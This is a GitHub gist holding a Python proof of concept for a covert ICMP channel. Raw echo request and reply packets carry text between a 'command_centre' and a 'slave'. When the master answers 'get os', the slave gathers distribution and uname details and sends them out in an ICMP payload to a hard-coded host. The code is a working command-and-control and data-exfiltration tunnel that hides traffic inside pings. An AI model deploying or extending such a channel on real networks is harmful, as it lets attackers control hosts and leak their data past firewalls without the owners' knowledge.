Created
August 5, 2019 15:27
-
-
Save efaisal/d3e2820d8e4a6975c4e9c55abee28412 to your computer and use it in GitHub Desktop.
POC using ICMP to exchange info
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import random | |
import socket | |
import select | |
import struct | |
import time | |
import platform | |
def checksum(frame):
    """Return the 16-bit one's-complement checksum of *frame*.

    The bytes are summed as 16-bit words whose first byte is the low-order
    byte; every carry out of bit 15 is folded back into the sum, and the
    final sum is bit-inverted.

    frame: a bytes-like object (indexing must yield ints).
    Returns an int in the range 0..0xffff.

    An odd-length frame is summed as if one trailing zero byte were
    appended, instead of failing on the missing last byte.
    """
    if len(frame) % 2:
        # Pad for summing only; the caller's data is not modified.
        frame = bytes(frame) + b'\x00'
    total = 0
    for i in range(0, len(frame), 2):
        word = frame[i] + (frame[i + 1] << 8)
        total += word
        # End-around carry keeps the running sum within 16 bits.
        total = (total & 0xffff) + (total >> 16)
    return ~total & 0xffff
def icmp_echo(hdr_id=None, seq=1, embed='', mtu=228):
    """Build an ICMP echo request (type 8, code 0) carrying *embed*.

    hdr_id: identifier for the header; a random value in 1..65535 is
        chosen when it is falsy (None or 0).
    seq: sequence number for the header.
    embed: payload as ``str`` (encoded as UTF-8) or ``bytes``.
    mtu: the payload is zero-padded to exactly ``mtu - 28`` bytes
        (28 presumably covers a 20-byte IP header plus the 8-byte ICMP
        header -- confirm if IP options are ever in play).

    Returns ``(hdr_id, packet_bytes)``.

    Raises TypeError if *embed* is neither str nor bytes, and ValueError
    if the encoded payload does not fit into ``mtu - 28`` bytes.
    """
    hdr_type, hdr_code = 8, 0
    if not hdr_id:
        hdr_id = random.randint(1, 65535)

    if isinstance(embed, str):
        embed = embed.encode('utf8')
    elif not isinstance(embed, bytes):
        raise TypeError('Unsupported type for `embed`')

    allowed_len = mtu - 28
    if len(embed) > allowed_len:
        raise ValueError('Payload too large for specified MTU')
    body = embed + b'\x00' * (allowed_len - len(embed))

    # Header is packed with a zero checksum first; the real checksum is
    # spliced into bytes 2..3 afterwards.
    hdr = struct.pack('bbHHh', hdr_type, hdr_code, 0, hdr_id, seq)

    summed = hdr + body
    if len(summed) % 2:
        # Odd total length (odd mtu): pad with a zero byte for summing only.
        summed += b'\x00'
    # checksum() combines byte pairs low byte first, so the result must be
    # stored low byte first too, whatever the host byte order is.
    chksum = struct.pack('<H', checksum(summed))

    return hdr_id, hdr[:2] + chksum + hdr[4:] + body
def icmp_echo_reply_parser(frame_id=None, seq=None, frame=None):
    """Extract the text payload of a reply matching *frame_id* and *seq*.

    frame: the ICMP message (8-byte header followed by the payload), with
        any IP header already removed.

    Returns the payload decoded as UTF-8 with trailing NUL padding
    stripped when the message type is not 8 (i.e. not an echo request)
    and both identifier and sequence number match. Returns None
    otherwise, including for frames shorter than the 8-byte header and
    for payloads that are not valid UTF-8, so unrelated or malformed
    traffic cannot raise out of the parser.
    """
    if frame is None or len(frame) < 8:
        return None
    hdr_type, _code, _chksum, hdr_id, hdr_seq = struct.unpack(
        'bbHHh', frame[:8]
    )
    # NOTE(review): any type other than 8 is accepted here, not only
    # type 0 (echo reply); kept as in the original logic.
    if hdr_type == 8 or hdr_id != frame_id or hdr_seq != seq:
        return None
    try:
        return frame[8:].rstrip(b'\x00').decode('utf-8')
    except UnicodeDecodeError:
        return None
def icmp_echo_parser(frame_id=None, seq=None, frame=None):
    """Extract the text payload of an ICMP echo request (type 8).

    frame: the ICMP message (8-byte header followed by the payload), with
        any IP header already removed.

    Returns:
        * the payload string when *frame_id* and *seq* both match the
          header;
        * ``(hdr_id, hdr_seq, payload)`` when both *frame_id* and *seq*
          are None, i.e. the caller has not pinned a session yet;
        * None in every other case, including frames shorter than the
          8-byte header and payloads that are not valid UTF-8 (for
          example ordinary pings), so such traffic cannot raise out of
          the parser.

    The payload is decoded as UTF-8 after stripping trailing NUL padding.
    """
    if frame is None or len(frame) < 8:
        return None
    hdr_type, _code, _chksum, hdr_id, hdr_seq = struct.unpack(
        'bbHHh', frame[:8]
    )
    if hdr_type != 8:
        return None

    matches_session = hdr_id == frame_id and hdr_seq == seq
    no_session_yet = frame_id is None and seq is None
    if not (matches_session or no_session_yet):
        return None

    try:
        text = frame[8:].rstrip(b'\x00').decode('utf-8')
    except UnicodeDecodeError:
        return None
    return text if matches_session else (hdr_id, hdr_seq, text)
def icmp_echo_reply(hdr_id, seq, embed='', mtu=228):
    """Build an ICMP echo reply (type 0, code 0) carrying *embed*.

    hdr_id: identifier to place in the header.
    seq: sequence number to place in the header.
    embed: payload as ``str`` (encoded as UTF-8) or ``bytes``.
    mtu: the payload is zero-padded to exactly ``mtu - 28`` bytes
        (28 presumably covers a 20-byte IP header plus the 8-byte ICMP
        header -- confirm if IP options are ever in play).

    Returns ``(hdr_id, packet_bytes)``.

    Raises TypeError if *embed* is neither str nor bytes, and ValueError
    if the encoded payload does not fit into ``mtu - 28`` bytes.
    """
    hdr_type, hdr_code = 0, 0

    if isinstance(embed, str):
        embed = embed.encode('utf8')
    elif not isinstance(embed, bytes):
        raise TypeError('Unsupported type for `embed`')

    allowed_len = mtu - 28
    if len(embed) > allowed_len:
        raise ValueError('Payload too large for specified MTU')
    body = embed + b'\x00' * (allowed_len - len(embed))

    # Header is packed with a zero checksum first; the real checksum is
    # spliced into bytes 2..3 afterwards.
    hdr = struct.pack('bbHHh', hdr_type, hdr_code, 0, hdr_id, seq)

    summed = hdr + body
    if len(summed) % 2:
        # Odd total length (odd mtu): pad with a zero byte for summing only.
        summed += b'\x00'
    # checksum() combines byte pairs low byte first, so the result must be
    # stored low byte first too, whatever the host byte order is.
    chksum = struct.pack('<H', checksum(summed))

    return hdr_id, hdr[:2] + chksum + hdr[4:] + body
def _slave_wait_reply(sock, packet_id, seq, timeout, skip=None):
    """Wait for the reply to (packet_id, seq); return its text, or None on timeout."""
    deadline = None if timeout is None else time.monotonic() + timeout
    while True:
        if deadline is None:
            remaining = None
        else:
            remaining = deadline - time.monotonic()
            if remaining <= 0:
                return None
        ready, _, _ = select.select([sock], [], [], remaining)
        if not ready:
            return None
        recv, _addr = sock.recvfrom(1024)
        # The first 20 bytes are assumed to be an option-less IP header.
        parsed = icmp_echo_reply_parser(packet_id, seq, recv[20:])
        if parsed is None or parsed == skip:
            # Unrelated ICMP traffic, or a plain echo of our own request:
            # keep waiting for the real answer.
            continue
        return parsed


def _slave_os_report():
    """Return distribution and uname details as the string form of a list."""
    legacy = getattr(platform, 'linux_distribution', None)
    if legacy is not None:
        distro = list(legacy())
    else:
        # platform.linux_distribution() no longer exists on Python 3.8+;
        # approximate its (name, version, id) triple from os-release
        # where that is available.
        try:
            release = platform.freedesktop_os_release()
        except (AttributeError, OSError):
            release = {}
        distro = [
            release.get('NAME', ''),
            release.get('VERSION_ID', ''),
            release.get('VERSION_CODENAME', ''),
        ]
    distro.extend(platform.uname())
    return str(distro)


def slave(dest, embed, mtu=228, timeout=2):
    """Run the scripted ICMP exchange against *dest* and collect the replies.

    dest: address of the peer to send echo requests to.
    embed: iterable of ``(command, expected_reply)`` pairs; each command is
        sent as an echo request payload, in order.
    mtu: forwarded to ``icmp_echo`` to size the packets.
    timeout: seconds to wait for each reply (None waits indefinitely).

    Returns the list of reply texts received, in order. The exchange stops
    at the first timeout or at the first reply that differs from the
    expected one (that unexpected reply is still included). If the last
    reply is ``'get os'``, an OS report is sent as one more echo request
    and the answer to it, if any arrives in time, is appended as well.

    Opens a raw ICMP socket (this typically needs elevated privileges) and
    always closes it, even when sending or building a packet fails.
    """
    reply_payload = []
    seq = 1
    packet_id = None
    sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, 1)  # 1 = ICMP
    try:
        for cmd, resp in embed:
            packet_id, payload = icmp_echo(packet_id, seq, cmd, mtu)
            sock.sendto(payload, (dest, 1))
            answer = _slave_wait_reply(sock, packet_id, seq, timeout, skip=cmd)
            if answer is None:  # timeout
                break
            reply_payload.append(answer)
            if answer != resp:  # peer said something unexpected
                break
            seq = seq + 1

        # Guard against an empty list: nothing may have been received at all.
        if reply_payload and reply_payload[-1] == 'get os':
            report = _slave_os_report()
            packet_id, payload = icmp_echo(packet_id, seq, report, mtu)
            sock.sendto(payload, (dest, 1))
            # An echo of the report itself counts as the answer here.
            answer = _slave_wait_reply(sock, packet_id, seq, timeout)
            if answer is not None:
                reply_payload.append(answer)
    finally:
        sock.close()
    return reply_payload
def command_centre(rules, mtu=228, timeout=2):
    """Answer a peer's ICMP echo requests according to *rules*.

    rules: mapping from request text to the reply text to send back.
    mtu: forwarded to ``icmp_echo_reply`` to size the reply packets.
    timeout: currently unused; the loop blocks until traffic arrives.

    The first echo request whose text is a key of *rules* fixes the
    session's identifier and sequence number. Echo requests seen before
    that whose text is not in *rules* (for example ordinary pings) are
    ignored, so they cannot pin the session to a foreign identifier.
    After each reply the expected sequence number is advanced by one.
    Once ``'get os'`` has been sent as a reply, the next matching request
    is taken as the peer's report.

    Returns the text of that report. The raw ICMP socket is always closed
    on the way out.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, 1)  # 1 = ICMP
    try:
        packet_id = seq = None
        awaiting_report = False
        while True:
            ready, _, _ = select.select([sock], [], [])
            if not ready:
                continue
            recv, addr = sock.recvfrom(65535)
            # The first 20 bytes are assumed to be an option-less IP header.
            parsed_req = icmp_echo_parser(packet_id, seq, recv[20:])
            if not parsed_req:
                continue
            if isinstance(parsed_req, tuple):
                # No session yet: only adopt id/seq from a request we know
                # how to answer.
                new_id, new_seq, text = parsed_req
                if text not in rules:
                    continue
                packet_id, seq, parsed_req = new_id, new_seq, text
            if awaiting_report:
                return parsed_req
            if parsed_req in rules:
                answer = rules[parsed_req]
                packet_id, payload = icmp_echo_reply(
                    packet_id, seq, answer, mtu
                )
                sock.sendto(payload, addr)
                seq = seq + 1
                if answer == 'get os':
                    awaiting_report = True
    finally:
        sock.close()
if __name__ == '__main__':
    # To run the command-centre side instead, use:
    #
    #     rules = {
    #         'helo master': 'helo slave',
    #         'ur cmd': 'get os'
    #     }
    #     cc = command_centre(rules)
    #     print('Slave report :: OS info')
    #     print(cc)

    # Slave side: each pair is (command to send, reply expected back).
    rules = (
        ('helo master', 'helo slave'),
        ('ur cmd', 'get os'),
    )
    replies = slave('192.168.122.99', rules)

    print('Master greet:')
    # The last collected entry is left out of the printed output.
    for line in replies[:-1]:
        print(line)
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment